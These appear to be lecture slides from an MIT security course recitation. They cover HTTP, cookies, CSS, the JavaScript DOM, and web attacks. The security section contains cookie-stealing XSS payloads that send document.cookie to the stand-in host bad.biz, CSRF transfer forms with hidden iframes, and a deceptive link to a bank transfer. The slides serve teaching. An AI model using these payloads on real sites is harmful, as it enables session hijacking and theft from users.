6.858 Recitation: The Web and The Browser

Jon Gjengset & Alex Grinman

The Web and The Browser

MIT 6.858 Recitation

Jon Gjengset

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

Browsers and sessions

When you navigate to a web page, your browser sends an HTTP request to the host named in the URL. The request contains information about the document being requested, plus information about the requesting browser.

Requesting a web page

			GET /zoobar/index.cgi/login?nexturl=... HTTP/1.1
			Host: zoobar:8080
			Connection: keep-alive
			Cache-Control: max-age=0
			Accept: text/html,application/xhtml+xml,...
			User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \
						(KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
			Referer: http://zoobar:8080/
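
To make the structure of the request above concrete, here is a minimal JavaScript sketch that splits a raw request into its request line and headers. The name parseRequest is hypothetical, the query string from the slide is left out, and the parser assumes well-formed input; it is nowhere near a full HTTP implementation.

```javascript
// Hypothetical helper: split the head of a raw HTTP request into its parts.
// Assumes a well-formed request; real servers must handle far more cases.
function parseRequest(raw) {
  const lines = raw.split(/\r?\n/);
  // Request line: METHOD SP request-target SP HTTP-version
  const [method, target, version] = lines[0].split(" ");
  const headers = new Map();
  for (const line of lines.slice(1)) {
    if (line === "") break; // a blank line ends the header section
    const colon = line.indexOf(":");
    if (colon === -1) continue; // skip malformed lines in this sketch
    // Header names are case-insensitive, so normalize them to lowercase.
    headers.set(line.slice(0, colon).toLowerCase(), line.slice(colon + 1).trim());
  }
  return { method, target, version, headers };
}

const request = parseRequest(
  "GET /zoobar/index.cgi/login HTTP/1.1\r\n" +
  "Host: zoobar:8080\r\n" +
  "Referer: http://zoobar:8080/\r\n" +
  "\r\n"
);
console.log(request.method, request.target, request.headers.get("host"));
// GET /zoobar/index.cgi/login zoobar:8080
```

Only the first colon on a header line separates name from value, which is why the port in the Host header survives.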
		

Serving a web page

			HTTP/1.0 200 OK
			Content-Type: text/html; charset=utf-8
			Content-Length: 1223
			 
			<!DOCTYPE html>
			<html>
				<head>
					<meta charset="utf-8">
					<title>Login - Zoobar Foundation</title>
			...
		

Web forms

			<form method="GET|POST" action="URL">
				<input name="field_name" type="text|hidden" />
				<input name="field_name" type="submit" value="Button text" />
			</form>
		

With POST, the form fields go in the request body; with GET, they go in the URL.

Query parameters

Form fields and other parameters are given in the URL after ?.
http://google.com/search?q=6858+lab3

Multiple key=value pairs are separated by &.
Every value is URL encoded to avoid parsing ambiguities:
?q=difference between = & ==? becomes
?q=difference%20between%20%3D%20%26%20%3D%3D%3F.

%XX just means the character with code 0xXX in ASCII; %20 = 0x20 = 32 = " " in ASCII.
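
The encoding rules above can be tried out directly in JavaScript. This is a small sketch using the built-in encodeURIComponent, decodeURIComponent, and URL; the variable names are just for illustration.

```javascript
// encodeURIComponent escapes every character that has a special meaning
// in a query string, so the value survives parsing intact.
const value = "difference between = & ==?";
const encoded = encodeURIComponent(value);
console.log(encoded); // difference%20between%20%3D%20%26%20%3D%3D%3F

// Decoding reverses the process.
console.log(decodeURIComponent(encoded) === value); // true

// The URL class parses query parameters for us. In form-style query
// strings, a "+" also stands for a space.
const url = new URL("http://google.com/search?q=6858+lab3");
console.log(url.searchParams.get("q")); // 6858 lab3

// %20 is character code 0x20, which is a space in ASCII.
console.log(String.fromCharCode(0x20) === " "); // true
```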

Submitting data to the server

			POST /zoobar/index.cgi/login HTTP/1.1
			...
			Content-Length: 94
			Content-Type: application/x-www-form-urlencoded
			 
			login_username=admin&login_password=admin&\
			submit_login=Log+in&nexturl=%2Fzoobar%2Findex.cgi%2F
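
As a sanity check on the request above, the body can be rebuilt in JavaScript with the built-in URLSearchParams. This is a sketch; the field values are simply the decoded versions of the ones in the slide.

```javascript
// Build an application/x-www-form-urlencoded body from decoded field values.
const fields = new URLSearchParams({
  login_username: "admin",
  login_password: "admin",
  submit_login: "Log in",        // the space is sent as "+"
  nexturl: "/zoobar/index.cgi/", // each "/" is sent as "%2F"
});
const body = fields.toString();
console.log(body);

// Content-Length counts bytes, not characters, so encode before measuring.
const contentLength = new TextEncoder().encode(body).length;
console.log(contentLength); // 94
```

The computed length matches the Content-Length header only when all four fields are joined with &.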
		

Browsers and sessions

HTTP was created to be stateless.

Cookies enable servers to track browsers across requests.

Cookies give us the key to the castle. Steal cookies and you steal another user's (authenticated) session.

Keeping track of users

			HTTP/1.0 302 FOUND
			Location: http://localhost:8081/zoobar/index.cgi/
			Set-Cookie: PyZoobarLogin=\
						admin#490fe09a56829992795ce8a4739fb279; Path=/
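
To see what the browser does with the header above, here is a rough JavaScript sketch that splits a Set-Cookie value into the cookie itself and its attributes. The function name parseSetCookie is hypothetical, and real cookie parsing has more rules than this.

```javascript
// Hypothetical helper: split a Set-Cookie header value into the cookie
// name/value pair and its attributes (Path, Expires, ...).
function parseSetCookie(headerValue) {
  const [pair, ...attributeParts] = headerValue.split(";");
  const eq = pair.indexOf("=");
  const name = pair.slice(0, eq).trim();
  const value = pair.slice(eq + 1).trim();
  const attributes = new Map();
  for (const part of attributeParts) {
    const [key, ...rest] = part.trim().split("=");
    if (key === "") continue;
    // Attribute names are case-insensitive.
    attributes.set(key.toLowerCase(), rest.join("="));
  }
  return { name, value, attributes };
}

const cookie = parseSetCookie(
  "PyZoobarLogin=admin#490fe09a56829992795ce8a4739fb279; Path=/"
);
console.log(cookie.name);                   // PyZoobarLogin
console.log(cookie.attributes.get("path")); // /

// On later requests to this site, the browser sends the pair back:
const cookieHeader = "Cookie: " + cookie.name + "=" + cookie.value;
console.log(cookieHeader);
```

Anyone who can send that Cookie header is treated as the logged-in user, which is why stealing it is so valuable.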
		

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

CSS: HTML's much prettier sibling

CSS lets you change the appearance of your HTML elements. Of particular importance to us is the ability to hide elements.

CSS is expressed as a set of rules, each consisting of one or more selectors and a declaration. A declaration assigns values to a number of properties to change various aspects of an element's appearance.

Selectors: what elements to change

			<div>...</div>
			<p>...</p>
			<div>...</div>
		
div { ... }

Selectors: what elements to change

			<div>...</div>
			<div id="a">...</div>
			<div>...</div>
		
#a { ... }

There can only be a single element on the page with a given ID.

Selectors: what elements to change

			<div class="a">...</div>
			<div class="a">...</div>
			<div>...</div>
		
.a { ... }

Selectors: what elements to change

Selectors can be combined with a space to select descendant elements (children, grandchildren, and so on).

			<div>
				<div class="a">...</div>
				<div>...</div>
			</div>
			<div class="a">...</div>
		
div .a { ... }

Selectors: what elements to change

They can also be ORed using ,.

			<div class="a">...</div>
			<div class="b">...</div>
			<div class="c">...</div>
		
.a, .c { ... }

Declarations: what to change

			<div>Turtles all the way down.</div>
			div {
				color: red;
			}
		

You can also use <div style="…">

Declarations: what to change

			<div>Turtles all the way down.</div>
			div {
				font-weight: bold;
			}
		

You can also use <div style="…">

Declarations: what to change

			<div>Turtles all the way down.</div>
			div {
				background-color: red;
				color: #CCC;
			}
		

You can also use <div style="…">

Declarations: what to change

Why are they useful? Well, we can hide things...

Hiding things with CSS

			<div>Turtles all the way down.</div>
			div {
				visibility: hidden;
			}
		

Hiding things: TIMTOWTDI

			<div>Turtles all the way down.</div>
			div {
				display: none;
			}
		

Hiding things: TIMTOWTDI

			<div>Turtles all the way down.</div>
			div {
				width: 0;
				height: 0;
				overflow: hidden;
			}
		

Hiding things: TIMTOWTDI

			<div>Turtles all the way down.</div>
			div {
				line-height: 0;
				font-size: 0;
				color: white;
			}
		

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

Dynamic web pages: JavaScript

JavaScript (unrelated to Java) is a scripting language that was built to allow developers to build pages that change client-side.

Can read and modify HTML documents, query browser state, prompt the user for input, and make HTTP requests as the user.

Dynamic web pages: JavaScript

			<script type="text/javascript">
				// Your JavaScript code goes here
				// It effectively executes as the user
			</script>
		

Debugging JavaScript

			// alert() is your friend for debugging
			alert("Hello world");
			// console.log() is even better
			console.log({ iam: "a JS object" });
		

Accessing HTML: The DOM

HTML documents are represented as trees in JavaScript. This tree is called the Document Object Model (DOM) and is accessed through document.

			var body = document.body;
			var body = document.getElementsByTagName("body")[0];
			var div  = document.getElementById("some_id");
			var divs = document.getElementsByClassName("some_class");
		

Accessing HTML: The DOM

In modern browsers, we can also query using CSS selectors!

			var div  = document.querySelector("div#some_id");
			var divs = document.querySelectorAll("div.some_class");
		

Accessing HTML: The DOM

We can also query the descendants of an element by running DOM lookups on that element:

			var div  = document.querySelector("div#some_id");
			var divs = document.querySelectorAll("div.some_class");
			var ps  = div.querySelectorAll("p");
		

A caveat

We can only find elements after they've been created

			<script>
				div = document.getElementById("ex"); // div will be null!
			</script>
			<div id="ex"></div>
			<script>
				div = document.getElementById("ex"); // yields HTMLDivElement
			</script>
		

DOM Events

JavaScript can react to events on the page.

			div.addEventListener("click", function(e) {
				alert("you clicked me");
			}, false)
		

It can also trigger events itself, such as a click on an element:

			link.click()
			
		

DOM Events to the rescue

Helps us wait for elements to become accessible:

			window.addEventListener("load", function(e) {
				// All page elements available here
			}, false)
		

JavaScript and forms

For the lab, you will be dealing with forms:

			form.addEventListener("submit", function(e) {
				e.preventDefault();
				alert("you tried to submit the form");
			}, false)
		
			// Submits the form directly; this does not fire the "submit" event above
			form.submit()
			
		

JavaScript and forms

We can also read values from form fields

			form.addEventListener("submit", function(e) {
				e.preventDefault();
				var input = form.getElementsByTagName('input')[0];
				alert("you tried to submit the value " + input.value);
			}, false)
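
Building on the listener above, here is a sketch that reads every named field instead of just the first input. The helper name collectFormValues is hypothetical, and the browser-only part assumes the form of interest is the first one on the page.

```javascript
// Hypothetical helper: gather the current value of every named <input>
// inside a form element into a plain object.
function collectFormValues(form) {
  const values = {};
  for (const input of form.querySelectorAll("input[name]")) {
    values[input.name] = input.value;
  }
  return values;
}

// This part only runs in a browser, where "document" exists.
if (typeof document !== "undefined") {
  const form = document.querySelector("form");
  if (form) {
    form.addEventListener("submit", function (e) {
      e.preventDefault();
      console.log(collectFormValues(form));
    }, false);
  }
}
```

Hidden inputs are included too, since they match the same selector.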
		

Manipulating the page

We can manipulate the HTML using DOM too

			div.textContent = "superman was here";
			div.innerHTML = "<strong>batman</strong> was here";
			var p = document.createElement("p");
			p.textContent = "6.858 TAs were here too";
			div.appendChild(p);
		

Communicating with the outside world

We can use HTML elements to communicate with the outside world!

			var img = document.createElement("img");
			img.setAttribute("src", "http://bad.biz/ping.png");
			// or just img.src = "http://bad.biz/ping.png";
			div.appendChild(img);
		

There's even a shorthand:

			(new Image()).src = "http://bad.biz/ping.png";
		

Communicating with the outside world

Loading can succeed or fail

			img.addEventListener("load", function() {
				// Image loaded successfully
			}, false)
			img.addEventListener("error", function() {
				// Image failed to load
			}, false)
		

You should add event listeners before appendChild!
Also useful on <iframe>

Timing is everything

Sometimes, patience is needed: setTimeout to the rescue.

			setTimeout(function() {
				// This will execute in ~2 seconds.
			}, 2 * 1000);
		

There is also setInterval for repeated execution.
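
As one possible use of setInterval, the sketch below polls a condition until it becomes true or a timeout passes. The helper name waitFor and its parameters are assumptions made for this example.

```javascript
// Hypothetical helper: call check() every intervalMs milliseconds until it
// returns true or timeoutMs has elapsed. The promise resolves to true on
// success and to false on timeout.
function waitFor(check, intervalMs, timeoutMs) {
  return new Promise(function (resolve) {
    const started = Date.now();
    const timer = setInterval(function () {
      if (check()) {
        clearInterval(timer); // stop repeating once we are done
        resolve(true);
      } else if (Date.now() - started >= timeoutMs) {
        clearInterval(timer);
        resolve(false);
      }
    }, intervalMs);
  });
}

// Example: wait for a flag that a setTimeout callback sets after ~50 ms.
let ready = false;
setTimeout(function () { ready = true; }, 50);
waitFor(function () { return ready; }, 10, 1000).then(function (ok) {
  console.log(ok ? "ready" : "timed out");
});
```

Remember to call clearInterval, or the callback keeps firing forever.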

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

What could possibly go wrong?

JavaScript acts with the user's privileges => Confused deputy.

Remember those cookies?

			<script>
				alert(document.cookie);
			</script>
		

What could possibly go wrong?

Remember how we can communicate with the outside world?

			<script>
				var target = "http://bad.biz/here-you-go.php?jar=";
				target += document.cookie;
				(new Image()).src = target;
			</script>
		

What could possibly go wrong?

Remember URL encoding?

			<script>
				var target = "http://bad.biz/here-you-go.php?jar=";
				target += encodeURIComponent(document.cookie);
				(new Image()).src = target;
			</script>
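
Why the encoding matters: the cookie value from the earlier Set-Cookie example contains a #. The sketch below uses the built-in URL class to show what the receiving server would see with and without encodeURIComponent.

```javascript
// Cookie string as document.cookie would report it for the earlier example.
const cookie = "PyZoobarLogin=admin#490fe09a56829992795ce8a4739fb279";
const base = "http://bad.biz/here-you-go.php?jar=";

// Without encoding, everything after "#" is parsed as the URL fragment,
// which browsers never send to the server.
const raw = new URL(base + cookie);
console.log(raw.searchParams.get("jar")); // PyZoobarLogin=admin
console.log(raw.hash);                    // #490fe09a56829992795ce8a4739fb279

// With encodeURIComponent, "=" and "#" are escaped and the value survives.
const safe = new URL(base + encodeURIComponent(cookie));
console.log(safe.searchParams.get("jar") === cookie); // true
console.log(safe.hash === "");                        // true
```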
		

But wait, we have Same-Origin!

Uh oh. But aren't there defenses against this?!

Yes! Same-Origin Policy:

JavaScript running in one origin (= host + port + protocol) cannot read or modify pages in other origins.
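
The definition of an origin can be checked with the built-in URL class, whose origin property combines protocol, host, and port. The helper name sameOrigin is made up for this sketch.

```javascript
// Two URLs share an origin only if protocol, host, and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

console.log(new URL("http://zoobar:8080/zoobar/index.cgi/").origin);
// http://zoobar:8080

console.log(sameOrigin("http://zoobar:8080/a", "http://zoobar:8080/b")); // true  (path is ignored)
console.log(sameOrigin("http://zoobar:8080/", "https://zoobar:8080/"));  // false (protocol differs)
console.log(sameOrigin("http://zoobar:8080/", "http://zoobar:8081/"));   // false (port differs)
console.log(sameOrigin("http://good.com/", "http://good.com:80/"));      // true  (80 is the default for http)
console.log(sameOrigin("http://good.com/", "http://bad.biz/"));          // false (host differs)
```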

So the attacker can't insert JavaScript in our page in the first place!

Phew, we're safe. Right?

So JavaScript on bad.biz can't read my bank page, or submit a form to transfer all my $$$. That's great.

Are we safe?

Hahaha, no.

Web service vulnerabilities

What if attacker can get malicious JavaScript to run in the right origin?

			<!-- hello.php -->
			<p>Hello <em><?php echo $_GET['name']; ?></em>.</p>
		

Web service vulnerabilities

GET hello.php?name=jon

			<p>Hello <em>jon</em>.</p>
			
		

Looks good — ship it!

Never trust user input.

GET hello.php?name=jon%3Cscript%3E%0A(new%20Image()).src%20%3D%20%22http%3A%2F%2Fbad.biz%2F%3Fx%3D%22%20%2B%20encodeURIComponent(document.cookie)%3B%0A%3C%2Fscript%3E

			<p>Hello <em>jon<script>
			(new Image()).src = "http://bad.biz/?x=" +
								encodeURIComponent(document.cookie);
			</script></em>.</p>
		

Oops.

Never trust user input.

Sometimes you will have to close tags/attributes in your values!

			<!-- users.php -->
			<input type="text"
				   name="user"
				   value="<?php if ($_GET['user']) {echo $_GET['user'];} ?>"
			/>
		

Code like this is often used to restore forms on errors.
These attacks are not specific to PHP.

Never trust user input.

GET users.php?user=%22%20%2F%3E%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E%3Cinput%20type%3D%22hidden%22%20value%3D%22

			<input type="text"
				   name="user"
				   value="" />
			<script>alert("xss")</script>
			<input type="hidden" value="" />
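
One common way to avoid the output above is to escape user input before echoing it into HTML. The sketch below is a JavaScript analogue of the users.php template, not the actual lab code; escapeHtml and renderUserInput are hypothetical names, and escaping like this only covers HTML text and quoted attribute values.

```javascript
// Hypothetical helper: escape the characters that let a value break out of
// HTML text or a quoted attribute. "&" must be replaced first.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// JavaScript analogue of the template, with escaping applied to the value.
function renderUserInput(user) {
  return '<input type="text" name="user" value="' + escapeHtml(user) + '" />';
}

// The decoded payload from the malicious URL.
const payload = '" /><script>alert("xss")</script><input type="hidden" value="';
console.log(renderUserInput(payload));
```

With escaping, the payload stays inside the value attribute as plain text instead of closing the tag and starting a script.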
		

Never trust user input.

Reflected Cross-Site Scripting is only effective if you can get someone to visit a malicious URL (which is not that hard).

Many other types of XSS exist. An attacker could, for example, store JavaScript in their username (stored XSS). It won't be echoed back immediately, but it will be printed wherever the username is shown, which allows attacking other users.

Cross-Site Request Forgery

Even if your site is not vulnerable to XSS, there are other ways to lose:

			<!-- evil.html -->
			<form method="POST" action="https://good.com/transfer">
				<input type="hidden" name="to" value="badguy" />
				<input type="hidden" name="amount" value="10000" />
				<input type="submit" value="Free iPad" />
			</form>
		

To good.com, this looks like a legitimate transfer request from the user!

Cross-Site Request Forgery

Don't want the user to see the target site? Use iframe and target.

			<!-- evil.html -->
			<form method="POST" action="https://good.com/transfer" target="f">
				<input type="hidden" name="to" value="badguy" />
				<input type="hidden" name="amount" value="10000" />
				<input type="submit" value="Free iPad" />
			</form>
			<iframe name="f" src="…"></iframe>
		

Only the (potentially hidden) iframe changes.

Cross-Site Request Forgery

In fact, there's an even easier way:
https://bank.com/xfer?amount=500&to=attacker.

"But banks use forms for transfers!"
https://x.wordpress.com/wp-admin/post.php?post=349&action=trash.

Getting users to click your link

I would never click such a link!
Anonymous 6.858 student on Piazza

Of course not! How about this one?

			https://www.google.com/maps/42.3625235,-71.0900909,3a,75y,200.43h,99.9t/data=!3m7!1e1!3m5!1s1pyYsZDrw11f-gKD36D2Ww!2e0!6s//geo0.ggpht.com/cbk?panoid=1pyYsZDrw11f-gKD36D2Ww&output=thumbnail&cb_client=maps_sv.tactile.gps&thumb=2&w=203&h=100&yaw=211.96698&pitch=0!7i13312!8i6656@bank.com/xfer?amount=500&to=attacker
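
Long links are hard to read by eye, so it can help to ask a URL parser where a link really goes. The sketch below uses a shortened, hypothetical link (not the one above) to show how text before an @ is treated as a username rather than as the host.

```javascript
// Hypothetical link for illustration: the part before "@" is parsed as a
// username, so the host that is actually contacted is bank.com.
const link = new URL("https://www.google.com@bank.com/xfer?amount=500&to=attacker");
console.log(link.username);               // www.google.com
console.log(link.hostname);               // bank.com
console.log(link.searchParams.get("to")); // attacker
```

Whether a particular link behaves this way depends on where the first / after the scheme falls, since the user-information part cannot contain one. A parser settles the question more reliably than reading the link by eye.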
		

Other vulnerabilities

Defenses